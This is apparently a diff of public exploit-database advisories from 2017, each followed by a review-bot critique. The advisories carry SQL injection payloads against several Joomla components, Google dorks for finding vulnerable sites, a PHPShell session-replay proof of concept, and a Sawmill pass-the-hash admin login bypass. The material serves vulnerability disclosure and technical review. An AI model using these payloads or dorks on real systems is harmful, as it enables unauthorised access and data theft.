# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# Etc...
|
||||
# # # # #
|
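Review bot: the three payloads are the same error-based `PROCEDURE ANALYSE` + `extractvalue()` construction, which is MySQL-specific and, since `PROCEDURE ANALYSE` was deprecated in MySQL 5.7.18 and removed in 8.0, will not confirm the bug on a current server even though the underlying injection would still be present; say so, or add a plain boolean/time-based confirmation that does not depend on that syntax. The `/*!50000...*/` wrappers are MySQL version-conditional comments and `0x496873616e2053656e63616e` is just the hex of `Ihsan Sencan` used as a marker, both worth a sentence so readers do not mistake them for required parts of the bug. The leading `'` on the `date` and `status` payloads versus none on the `id` payload indicates quoted versus numeric contexts; state that explicitly rather than leaving it to be inferred. The SEF-style paths (`/room/book`, `/my-bookings`) also hide the `option=com_roommgmt` given in the dork; include the non-SEF form so the sink can be located in the component source.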
23
platforms/php/webapps/41390.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_bazaar
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://matamko.com/
|
||||
# Software Buy: http://matamko.com/products/bazaar/live-demo
|
||||
# Demo: http://matamko.com/products/bazaar/live-demo
|
||||
# Version: 3.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL]
|
||||
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL]
|
||||
# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL]
|
||||
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# Etc...
|
||||
# # # # #
|
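Review bot: the payload prefixes differ across the three URLs (`1+` for `category` and `productid`, `1'+` for `searchproduct`), which tells the reader that the first two are numeric contexts and the third is a quoted string, but nothing in the text says so; make that explicit per parameter. The first two URLs share `view=productsearch`, so note whether `category` and `searchproduct` feed the same query or two different ones, and `Etc...` should either name the remaining parameters or be removed.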
19
platforms/php/webapps/41391.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Google Map Store Locator v4.4 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_googlemaplocator
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://matamko.com/
|
||||
# Software Buy: http://matamko.com/products/google-map-store-locator/live-demo
|
||||
# Demo: http://gtlocator4.demo.matamko.com/
|
||||
# Version: 4.4
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/?filter_to=a&filter_day=21-02-2017&filter_time=[SQL]
|
||||
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
|
||||
# Etc...
|
||||
# # # # #
|
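Review bot: the PoC URL `?filter_to=a&filter_day=21-02-2017&filter_time=[SQL]` carries no `option=com_googlemaplocator`, unlike the dork, so it depends on a SEF menu item that an installation may not have; give the non-SEF `option`/`view` form so the `filter_time` sink can be found in the component source and reproduced on any install. The unquoted `+PROCEDURE` payload implies `filter_time` is used in a numeric context, which is unusual for a time filter and worth stating. The files.csv description should name `filter_time`, since it is the only parameter shown.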
20
platforms/php/webapps/41393.txt
Executable file
|
@ -0,0 +1,20 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_mostwantedrealestate
|
||||
# Date: 18.02.2017
|
||||
# Vendor Homepage: http://mostwantedrealestatesites.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/most-wanted-real-estate/
|
||||
# Demo: http://demo.mostwantedrealestatesites.com/
|
||||
# Version: 1.1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=[SQL]
|
||||
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=[SQL]
|
||||
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
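Review bot: the three URLs differ only in which filter receives `[SQL]` (`which_order`, `filter_a1maxarea`, `filter_a1minarea`) and the rest of each query string is padding, so a short list of injectable parameters would be clearer than 200-character URLs; `filter_a1search=Ihsan_Sencan` is an author marker, not a required value, and should be labelled as such. `which_order` is presumably consumed in an ORDER BY clause while the area filters are numeric comparisons; these are different SQL contexts and the advisory should state each, and no payload or error output is given for any of them.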
136
platforms/php/webapps/41396.txt
Executable file
|
@ -0,0 +1,136 @@
|
|||
[+] Credits: John Page AKA hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
==================================
|
||||
sourceforge.net/projects/phpshell/
|
||||
phpshell.sourceforge.net/
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
==============
|
||||
PHPShell v2.4
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
Session Fixation
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
PHPShell does not regenerate the Session ID upon authentication, this can
|
||||
potentially allow remote attackers to access parts of the application
|
||||
using only a valid PHPSESSID if PHP.INI setting for
|
||||
session.use_only_cookies=0.
|
||||
|
||||
Since an existing XSS vulnerability exists in PHPShell "
|
||||
http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt"
|
||||
the risk is
|
||||
increased if an authenticated user clicks an attacker supplied link and the
|
||||
attacker finds way to access or set the victims Cookie.
|
||||
|
||||
In 'phpshell.php' line 153 we see call to PHP function session_start();
|
||||
|
||||
After user authentication no call to "session_regenerate_id()" is made
|
||||
leaving the authenticated session id same as pre-auth session id.
|
||||
However, "session.use_only_cookies=1" is default since PHP 4.3.0, so to
|
||||
exploit it would require that PHP.INI is set to session.use_only_cookies=0
|
||||
on the victims system.
|
||||
|
||||
When accessing the application using the session fixation flaw and
|
||||
attempting to run system command the application luckily redirects to login
|
||||
form.
|
||||
However, if a victim is actively changing directorys, reading files etc...
|
||||
attackers may still be able to read current directory and files open
|
||||
in the victims PHPShell console window.
|
||||
|
||||
|
||||
|
||||
Exploit/POC:
|
||||
=============
|
||||
|
||||
1) Login to PHPShell run commands to CD to Windows directory and run DIR
|
||||
command etc, then find and copy the PHPSESSID Cookie
|
||||
|
||||
2) Open a second browser (InternetExplorer) and access the application
|
||||
cleanly for first time using the PHPSESSID in URL.
|
||||
|
||||
e.g.
|
||||
|
||||
http://VICTIM-IP/phpshell-2.4/phpshell.php?PHPSESSID=<STOLEN-SESSION-ID>
|
||||
|
||||
You should see what the authenticated victim now sees...
|
||||
|
||||
e.g.
|
||||
|
||||
Current Working Directory:
|
||||
Change to subdirectory:
|
||||
|
||||
07/13/2009 08:51 PM 24,576 Microsoft.MediaCenter.iTv.Hosting.dll
|
||||
11/20/2010 10:24 PM 147,968 Microsoft.MediaCenter.iTV.Media.dll
|
||||
07/13/2009 08:52 PM 45,056 Microsoft.MediaCenter.ITVVM.dll
|
||||
11/20/2010 10:24 PM 56,320 Microsoft.MediaCenter.Mheg.dll
|
||||
11/20/2010 10:24 PM 114,688 Microsoft.MediaCenter.Playback.dll
|
||||
11/20/2010 10:24 PM 1,572,864 Microsoft.MediaCenter.Shell.dll
|
||||
11/20/2010 10:24 PM 241,664 Microsoft.MediaCenter.Sports.dll
|
||||
11/20/2010 10:24 PM 327,168
|
||||
Microsoft.MediaCenter.TV.Tuners.Interop.dll
|
||||
11/20/2010 10:24 PM 2,596,864 Microsoft.MediaCenter.UI.dll
|
||||
10/29/2011 12:23 AM 465,920 mstvcapn.dll
|
||||
11/20/2010 10:24 PM 88,576 NetBridge.dll
|
||||
07/13/2009 08:51 PM 106,496 RegisterMCEApp.exe
|
||||
06/10/2009 04:04 PM 129,528 segmcr.ttf
|
||||
|
||||
etc...
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
=========
|
||||
Medium
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=============================
|
||||
Vendor Notification: No reply
|
||||
Also, the INSTALL file "Bugs? Comments? Tracker System link" is HTTP 404
|
||||
http://sourceforge.net/tracker/?group_id=156638
|
||||
February 18, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c) HYP3RLINX -
|
||||
ApparitionSec
|
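Review bot: the PoC in steps 1 and 2 copies the PHPSESSID of an already-authenticated session and replays it in a second browser, which demonstrates session hijacking, not session fixation; fixation means the attacker chooses the id before the victim authenticates and it stays valid afterwards because `session_regenerate_id()` is never called, which is the defect the Security Issue section correctly describes. A fixation PoC would show a pre-chosen id surviving the login, and the fix for the advisory to recommend is `session_regenerate_id(true)` immediately after successful authentication. The PHP history is also off: `session.use_only_cookies` was introduced in PHP 4.3.0, but its default only changed to 1 in PHP 5.3.0, so the precondition `session.use_only_cookies=0` describes any unmodified PHP older than 5.3 as well as deliberately reconfigured systems. Minor: the quoted XSS advisory URL is split across a line break with a stray `"` at each end, and `directorys`/`victims` should be `directories`/`victim's`.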
138
platforms/php/webapps/41395.txt
Executable file
|
@ -0,0 +1,138 @@
|
|||
[+] Credits: John Page AKA Hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
www.sawmill.net
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
========================
|
||||
Sawmill Enterprise v8.7.9
|
||||
|
||||
sawmill8.7.9.4_x86_windows.exe
|
||||
hash: b7ec7bc98c42c4908dfc50450b4521d0
|
||||
|
||||
Sawmill is a powerful heirarchical log analysis tool that runs on every
|
||||
major platform.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================================
|
||||
Pass the Hash Authentication Bypass
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-5496
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
=====================
|
||||
Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an
|
||||
attacker who gains access to the hashed user account passwords
|
||||
can login to the Sawmill interface using the raw MD5 hash values, allowing
|
||||
attackers to bypass the work of offline cracking
|
||||
account password hashes.
|
||||
|
||||
|
||||
This issue usually is known to affect Windows systems e.g. (NT Pass the
|
||||
Hash/Securityfocus, 1997). However, this vulnerability can also
|
||||
present itself in a vulnerable Web application.
|
||||
|
||||
Sawmill account password hashes are stored under LogAnalysisInfo/ directory
|
||||
in "users.cfg".
|
||||
|
||||
e.g.
|
||||
|
||||
users = {
|
||||
root_admin = {
|
||||
username = "admin"
|
||||
password_checksum = "e99a18c428cb38d5f260853678922e03"
|
||||
email_address = ""
|
||||
|
||||
|
||||
This config file is stored local to the Sawmill application. However, if an
|
||||
attacker gains access to a backup of the config that is
|
||||
stored in some other location that is then compromised, it can lead to
|
||||
subversion of Sawmills authenticaton process.
|
||||
|
||||
Moreover, since 'users.cfg' file is world readble a regular non Admin
|
||||
Windows user who logs into the system running sawmill can now grab
|
||||
a password hash and easily login to the vulnerable application without the
|
||||
needing the password itself.
|
||||
|
||||
|
||||
How to test?
|
||||
|
||||
|
||||
Sawmill running (default port 8988), log off Windows and switch to a
|
||||
"Standard" Windows non Administrator user.
|
||||
|
||||
1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.
|
||||
|
||||
2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin.
|
||||
|
||||
|
||||
Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no
|
||||
salt.
|
||||
|
||||
|
||||
e.g.
|
||||
|
||||
password: abc123
|
||||
MD5 hash:
|
||||
e99a18c428cb38d5f260853678922e03
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=====================================
|
||||
Vendor Notification: January 7, 2017
|
||||
CVE-2017-5496 assigned : January 20
|
||||
Request status : January 26
|
||||
Vendor: Fix avail later in year still no ETA
|
||||
Inform vendor public disclose date
|
||||
February 18, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Impact:
|
||||
======================
|
||||
Information Disclosure
|
||||
Privilege Escalation
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
================
|
||||
High
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
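Review bot: the Security Issue section says the stored `password_checksum` can be submitted as the password, but does not show the login request, so the reader cannot tell whether the browser hashes the password client-side before sending it (in which case the stored hash is the effective credential and "pass the hash" is exact) or whether the server accepts either the password or its MD5 (a comparison bug); capture the POST from the login page and include it, because the correct fix differs between the two. The `users.cfg` is "world readble" claim needs the actual ACL (for example `icacls` output on `C:\Program Files\Sawmill 8\LogAnalysisInfo\users.cfg`) rather than an assertion, since a non-administrator being able to read that path is the crux of the local privilege escalation impact. The unsalted-MD5 example is internally consistent (`e99a18c428cb38d5f260853678922e03` is MD5 of `abc123`), but the advisory has no mitigation section; at minimum it should recommend restricting the ACL on `LogAnalysisInfo` and moving to a salted password hash. Style: `heirarchical`, `authenticaton`, `readble`, `Sawmills`, and `your Admin` should read `hierarchical`, `authentication`, `readable`, `Sawmill's`, and `you're Admin`.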